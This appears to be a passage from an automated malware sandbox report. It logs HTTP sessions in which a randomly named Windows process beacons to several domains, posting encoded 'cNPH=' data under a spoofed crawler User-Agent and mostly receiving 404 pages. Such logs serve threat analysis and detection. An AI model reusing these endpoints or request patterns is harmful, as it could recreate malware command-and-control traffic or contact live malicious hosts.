37 64 32 65 56 68 6e 50 77 6e 77 77 6d 6e 49 62 74 73 57 75 58 72 42 6c 68 78 39 33 35 31 67 4a 2b 32 47 4b 41 52 6a 72 68 41 63 66 71 52 2f 41 59 52 47 55 35 64 79 76 64 42 4c 30 46 2b 63 66 59 4a 53 37 42 66 53 37 70 66 38 50 62 4d 5a 2b 71 48 6c 37 5a 4b 62 4a 30 61 68 79 62 4d 65 67 2f 57 47 4f 30 45 66 36 78 53 45 67 43 75 31 56 6d 6a 6b 41 33 33 41 66 45 6c 34 6d 65 73 4b 37 35 37 35 32 71 35 54 56 70 [TRUNCATED] Data Ascii: cNPH=YMGYuRah9o15p07KQKQTUoLTT7QJBmqkmAWrS/hcorn9nq8pZutctsUgPyEyKPw/T/EGIvgYGn7ipKrDKWSzdrHPaxkNqLgVlpVwBf1zYeWQyuCjYso5GqqHq8ZMqymqI7nAnI9c0aO8ZTlXGjgrjwKxsTjFnQN5ucTpqt/VvUlqtFJXiruvWiCEOW5UXaJ74AjR7d2eVhnPwnwwmnIbtsWuXrBlhx9351gJ+2GKARjrhAcfqR/AYRGU5dyvdBL0F+cfYJS7BfS7pf8PbMZ+qHl7ZKbJ0ahybMeg/WGO0Ef6xSEgCu1VmjkA33AfEl4mesK75752q5TVpwvLtq2GNegI4AyuqZBQvj5sRgvcQH/asTnF5AonDLgC+sAvUWJcaexTYA9MqgdguZfNm2JxH4urLWBTSHV7ybXlftHic4fk/mcUNIhRJ/+N4WYSQ8W6U8eE4LtXzWJQiHVUWFT4mKGXWFi3JG/WVa9YHxeN9zvwGI01EeKD/4B9A1kALfP0hDxGe+3lEj9o4ci4b+FlN8B6qIQlVKekhY6lIMbInPQUK3o2JbB28qjvf9KrvLRBnUWWCy744ZFQdXakU9UPmX69jD+5Q2pDekKQTbuUDiAUDYNbLQ4s2HrPXJSOMVOgbescP1RRmHU6C/4hJc+yVO5YA4YPll9exwiMtxe3ZWdqQ9wZGfvBhNOaOoMOLyQVZYOMlClhsko9k/ntBLrfj7GLF1c57Nx3ji9vCFR13b6+jLpF6xZLVopm5OUlp4lItmLfU56a+Ut8Z7Q/jZVdQUI2+fum6F1pR7SBZsxQKWgMWqGQHxker4NS4mfWDrPvRx0fC1nNee5c0xpyDAwtn8xpSFyk6Hj5VtFXLIlpIQ8NZa2l+fALmeReSMGVrbde3fVb8rW+XXimp0OyWMOE84eUepjFaUoDJO8Or0hfOi6jIRROfsFOY3/x1qZYgXfKdrx1XDuzegvbQvD6prcSLU8KMnhNVkMZKsNAaFRwQ3m9Ck5 [TRUNCATED]
Jan 11, 2025 02:45:25.545022011 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:45:25 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49985	209.74.79.41	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:27.514532089 CET	438	OUT	GET /b0aw/?EtJTX=_JVX4ryxDRQpLJF&cNPH=VOu4tm+43rVZiGe4K7AcFv6we6IMDB3Zsn+bRP9LrJ7FkoQwRvlgysJ6PgYNNu0oJqR3Guk7DWW32PLwVgqLPrvuPSkYs6IWzvZ1It1WQJjP5+KmCtojeJnesOx46iHJS4Dx3Mp7sKKT HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.thinkone.xyz Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 02:45:28.110846996 CET	548	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:45:28 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49986	46.38.243.234	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:33.195075989 CET	682	OUT	POST /ixqi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.mraber.dev Origin: http://www.mraber.dev Referer: http://www.mraber.dev/ixqi/ Content-Length: 217 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 65 50 56 45 59 56 44 6f 70 53 62 79 75 45 54 41 30 33 64 74 73 30 4d 5a 4d 49 72 4c 76 68 77 36 79 37 35 4e 31 35 58 73 5a 49 61 53 2f 6e 4d 65 66 4b 79 55 67 65 6b 42 38 58 6a 48 5a 4f 61 59 59 4c 72 58 63 75 2b 42 61 57 7a 56 6e 37 51 51 5a 75 35 51 46 58 4f 4c 72 73 37 6d 74 36 4f 63 55 48 55 62 52 6f 42 78 51 2f 53 36 69 30 43 50 4b 42 64 45 64 49 6e 6f 37 6c 4f 30 57 48 7a 4d 79 6d 5a 64 6a 68 75 6c 4e 2b 44 6d 33 58 55 37 75 76 74 6e 78 38 37 46 4e 4d 53 73 54 37 4c 33 6c 76 78 72 44 4b 71 63 59 69 76 7a 37 47 57 62 34 54 5a 54 39 4c 73 35 6c 4f 73 55 75 2f 54 75 52 4c 58 65 64 31 5a 4b 41 67 32 44 78 67 45 68 42 41 3d 3d Data Ascii: cNPH=ePVEYVDopSbyuETA03dts0MZMIrLvhw6y75N15XsZIaS/nMefKyUgekB8XjHZOaYYLrXcu+BaWzVn7QQZu5QFXOLrs7mt6OcUHUbRoBxQ/S6i0CPKBdEdIno7lO0WHzMymZdjhulN+Dm3XU7uvtnx87FNMSsT7L3lvxrDKqcYivz7GWb4TZT9Ls5lOsUu/TuRLXed1ZKAg2DxgEhBA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49987	46.38.243.234	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:35.739959002 CET	702	OUT	POST /ixqi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.mraber.dev Origin: http://www.mraber.dev Referer: http://www.mraber.dev/ixqi/ Content-Length: 237 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 65 50 56 45 59 56 44 6f 70 53 62 79 75 6e 4c 41 79 55 31 74 71 55 4d 65 4a 49 72 4c 6b 42 77 2b 79 37 31 4e 31 34 44 43 46 74 4b 53 2f 43 49 65 65 49 61 55 6a 65 6b 42 76 58 6a 47 64 4f 61 74 59 4c 6e 66 63 73 61 42 61 57 58 56 6e 36 67 51 5a 64 51 69 4b 6e 4f 4a 6b 4d 37 65 77 4b 4f 63 55 48 55 62 52 6f 56 66 51 2f 61 36 69 6e 61 50 46 44 6c 4c 65 49 6e 70 7a 46 4f 30 63 58 7a 49 79 6d 5a 72 6a 67 79 44 4e 34 48 6d 33 57 6b 37 67 62 35 6b 37 38 36 4d 54 38 54 4e 43 59 71 62 67 64 78 70 50 59 36 4a 56 6a 54 6a 7a 51 58 35 69 78 56 2f 6a 61 55 43 68 4d 49 69 35 5a 4f 62 54 4b 54 47 51 58 74 72 66 58 54 70 38 79 6c 6c 58 77 71 69 4f 45 72 7a 4c 79 48 51 6a 36 6c 57 52 51 58 4a 36 76 59 3d Data Ascii: cNPH=ePVEYVDopSbyunLAyU1tqUMeJIrLkBw+y71N14DCFtKS/CIeeIaUjekBvXjGdOatYLnfcsaBaWXVn6gQZdQiKnOJkM7ewKOcUHUbRoVfQ/a6inaPFDlLeInpzFO0cXzIymZrjgyDN4Hm3Wk7gb5k786MT8TNCYqbgdxpPY6JVjTjzQX5ixV/jaUChMIi5ZObTKTGQXtrfXTp8yllXwqiOErzLyHQj6lWRQXJ6vY=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49988	46.38.243.234	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:38.289623976 CET	1715	OUT	POST /ixqi/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.mraber.dev Origin: http://www.mraber.dev Referer: http://www.mraber.dev/ixqi/ Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 65 50 56 45 59 56 44 6f 70 53 62 79 75 6e 4c 41 79 55 31 74 71 55 4d 65 4a 49 72 4c 6b 42 77 2b 79 37 31 4e 31 34 44 43 46 74 43 53 2f 30 30 65 65 70 61 55 69 65 6b 42 30 33 6a 4c 64 4f 61 30 59 4c 2f 6c 63 73 6e 6a 61 51 54 56 6d 59 6f 51 56 38 51 69 64 33 4f 4a 76 73 37 6c 74 36 4f 4a 55 48 45 58 52 6f 46 66 51 2f 61 36 69 68 32 50 4d 78 64 4c 59 49 6e 6f 37 6c 4f 67 57 48 79 66 79 6d 52 56 6a 68 47 31 4e 4c 50 6d 35 56 4d 37 69 75 74 6b 33 38 36 4f 53 38 54 76 43 59 6d 45 67 64 38 57 50 5a 4f 6a 56 67 44 6a 77 45 61 6d 6e 51 64 79 30 63 55 41 72 4d 45 6b 37 59 71 4d 61 4c 50 4e 52 67 4e 6b 56 41 58 4e 79 30 55 6b 63 78 58 36 63 56 2f 42 49 52 44 4c 6f 74 55 36 4f 79 79 4d 6f 4b 33 42 69 56 39 43 75 75 7a 61 30 39 42 6e 58 46 66 65 2b 68 63 4a 65 56 5a 44 58 34 42 52 61 36 6a 4e 41 47 33 33 46 70 59 69 76 4a 4d 37 44 6d 76 45 5a 73 74 4f 52 50 76 71 63 51 45 51 63 4a 73 6f 4b 6f 59 6e 4c 4d 4f 56 59 53 58 48 6d 35 65 2b 71 64 69 6d 2b 69 6b 32 34 78 58 34 67 79 46 39 41 4b 58 63 44 [TRUNCATED] Data Ascii: cNPH=ePVEYVDopSbyunLAyU1tqUMeJIrLkBw+y71N14DCFtCS/00eepaUiekB03jLdOa0YL/lcsnjaQTVmYoQV8Qid3OJvs7lt6OJUHEXRoFfQ/a6ih2PMxdLYIno7lOgWHyfymRVjhG1NLPm5VM7iutk386OS8TvCYmEgd8WPZOjVgDjwEamnQdy0cUArMEk7YqMaLPNRgNkVAXNy0UkcxX6cV/BIRDLotU6OyyMoK3BiV9Cuuza09BnXFfe+hcJeVZDX4BRa6jNAG33FpYivJM7DmvEZstORPvqcQEQcJsoKoYnLMOVYSXHm5e+qdim+ik24xX4gyF9AKXcDGYh+en/75D453Ak9ZyGutx4gfkjbCOeN2m0mjJc9CIOLKZLlwqB63iiZDv8po2Mj+ZBTjnTDUaVEa2ACD5OYgS7GyxbKaFfN3Arq7v1eCnPHucqx0TaPKBKSbdPP8jT6nyomzXF0JzuL4Y36Ac66CU/wLLCF1lomJIateWZSBgo0e4gug6Cq3ar9NrYSvdAjJYbK9IcgNXrjsvIuUb6bTFVzg2GOaPCHl2CGRW5aSpDrC5Sw0/KJkWvwaPy+pt8kPZx27SRysh8Q8ZpeqLhCWxCQQVJhKWoZnyl5pjUI5nPQVZPZqoXXORbmdNAfEDU/X3hci3jWW1vIbLFLFaf6xh8IbIRZZTF4Z6z/LXb911pPquQ1kt/bEXP50ca4UB6R2szGCDnY9j4NuT5s4CTqYtGAhXaX7r16moEHRGS0f4LWUpdNZd9hFTYGYoLcohdJ2f54Ok0T0WFkdQOOQg6BonfVLyS0vUi83kIhbwtnIWWCWZchbBgfwjGia92/OqbVwfEDRJ+hkRhgq8md3iXwKlxy3FMcm8te646BTtw10ck2bJcWx3BMYkPLQhbkx/qLtH4YpMbcDeM06F3L2L0FqnGgxbwufEiCEdV8Tc75vif+H+qpbS5nK3Q0VL8SnSbpzr0d3anFQvoFIAWYdaTYJ5TLtK7Di771ha [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49989	46.38.243.234	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:40.825345039 CET	436	OUT	GET /ixqi/?cNPH=TN9kbi/KmEXimVSK7kRkm1cjJuW4yHg+jZBVyY7nUo7X8XNTQ6Sf+9UR1HXDT/eLXOeLcdefCmPPvtkAMYUyfl2Biaruko68KDljX6JEffS78HWaQA9pI6q30E6ldWWZvXFcrza4Lp7u&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.mraber.dev Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 02:45:44.726852894 CET	456	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:43:03 GMT Server: Apache/2.4.10 (Debian) Content-Length: 276 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 72 61 62 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.mraber.dev Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49990	188.114.97.3	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:49.788472891 CET	703	OUT	POST /8g74/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.einpisalpace.shop Origin: http://www.einpisalpace.shop Referer: http://www.einpisalpace.shop/8g74/ Content-Length: 217 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 62 4c 58 4c 47 65 79 79 5a 4e 43 57 5a 73 75 4c 46 51 6f 71 49 48 65 6d 37 6e 61 79 6f 71 6a 53 50 66 4b 69 75 4d 4e 51 66 72 56 61 46 35 43 78 47 64 75 34 46 4a 75 6e 63 75 54 67 36 67 2f 78 59 2b 51 4e 58 55 63 4f 76 6f 31 5a 49 35 34 4d 58 46 48 6b 6b 68 4d 30 6d 32 6b 54 39 35 79 71 44 62 39 74 30 50 62 42 62 2b 69 70 43 4d 39 53 4f 46 71 50 6d 76 58 41 33 65 70 64 35 35 76 76 77 70 7a 73 67 36 44 67 34 4a 35 70 30 35 30 31 32 73 32 70 7a 56 64 68 77 4d 53 73 52 39 55 41 34 43 47 55 53 6d 6a 71 7a 68 64 43 5a 6e 5a 75 62 46 53 2f 55 49 42 4a 35 4f 71 45 33 30 67 55 62 68 6e 37 37 5a 6b 6b 2f 70 4f 64 5a 32 2b 67 58 51 3d 3d Data Ascii: cNPH=bLXLGeyyZNCWZsuLFQoqIHem7nayoqjSPfKiuMNQfrVaF5CxGdu4FJuncuTg6g/xY+QNXUcOvo1ZI54MXFHkkhM0m2kT95yqDb9t0PbBb+ipCM9SOFqPmvXA3epd55vvwpzsg6Dg4J5p05012s2pzVdhwMSsR9UA4CGUSmjqzhdCZnZubFS/UIBJ5OqE30gUbhn77Zkk/pOdZ2+gXQ==
Jan 11, 2025 02:45:50.950886965 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:45:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O0CmSauuZb9VjXu0Bt6h3zJ3qCJuMnT5GXgeBuONyqWRNFArNhVUHtuHu4ZRiWu%2FgpBHegTMol7Ujdpnkp%2B1Da8ooFfwwgUuyvpmS2CWK%2BOnYR7DxqetqxNJtRolzU12u6QqybMsFDg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90013ac8af72440d-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1578&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=703&delivery_rate=0&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED] Data Ascii: 2cfTMo8WELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC$Dvul6+y.K";HIRDo4"eH^od3ZWoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
Jan 11, 2025 02:45:50.950903893 CET	380	IN	Data Raw: 96 52 c5 70 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2 69 4f fb 75 b1 03 41 58 Data Ascii: Rp>6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%<PhtD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49991	188.114.97.3	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:45:52.336381912 CET	723	OUT	POST /8g74/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.einpisalpace.shop Origin: http://www.einpisalpace.shop Referer: http://www.einpisalpace.shop/8g74/ Content-Length: 237 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 62 4c 58 4c 47 65 79 79 5a 4e 43 57 59 4d 2b 4c 4b 57 67 71 5a 58 65 6c 2b 6e 61 79 69 4b 6a 57 50 66 47 69 75 49 64 41 63 65 46 61 4c 38 75 78 46 5a 79 34 43 4a 75 6e 57 4f 54 68 6e 51 2f 2b 59 2b 63 61 58 56 67 4f 76 6f 52 5a 49 37 51 4d 58 79 7a 6e 2b 52 4d 32 34 57 6b 64 6a 4a 79 71 44 62 39 74 30 4f 2b 63 62 2b 36 70 43 39 4e 53 50 6b 71 4d 6c 76 58 48 77 65 70 64 75 70 76 7a 77 70 7a 53 67 37 65 6f 34 4c 42 70 30 35 45 31 34 59 69 71 35 56 64 6a 2b 73 54 45 59 66 42 75 69 6a 69 52 54 31 44 79 38 44 77 68 56 78 59 4d 42 6e 65 54 4b 5a 35 79 39 4d 4f 79 67 53 39 68 5a 67 6a 6a 32 37 51 46 67 65 72 33 55 6b 66 6b 42 72 4a 76 7a 61 77 52 74 2f 37 70 2f 50 35 4f 54 6d 2f 74 41 32 45 3d Data Ascii: cNPH=bLXLGeyyZNCWYM+LKWgqZXel+nayiKjWPfGiuIdAceFaL8uxFZy4CJunWOThnQ/+Y+caXVgOvoRZI7QMXyzn+RM24WkdjJyqDb9t0O+cb+6pC9NSPkqMlvXHwepdupvzwpzSg7eo4LBp05E14Yiq5Vdj+sTEYfBuijiRT1Dy8DwhVxYMBneTKZ5y9MOygS9hZgjj27QFger3UkfkBrJvzawRt/7p/P5OTm/tA2E=
Jan 11, 2025 02:45:53.490735054 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 01:45:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=teXYA8hL9HmP9w5hZ1GMrl0zqxTep6oUyyDsEjdwG35yZ8HwDlwBPTML0uQ2%2B2BiFaQrzD9un9DY7qdJeRccCFflc4%2Fn3lvX6bAbI%2BQoGRxSlfj6w%2Bz7mG9MehdLBVzr0GD0UEpL5TM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90013ad88cbb43ab-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1600&rtt_var=800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=723&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac 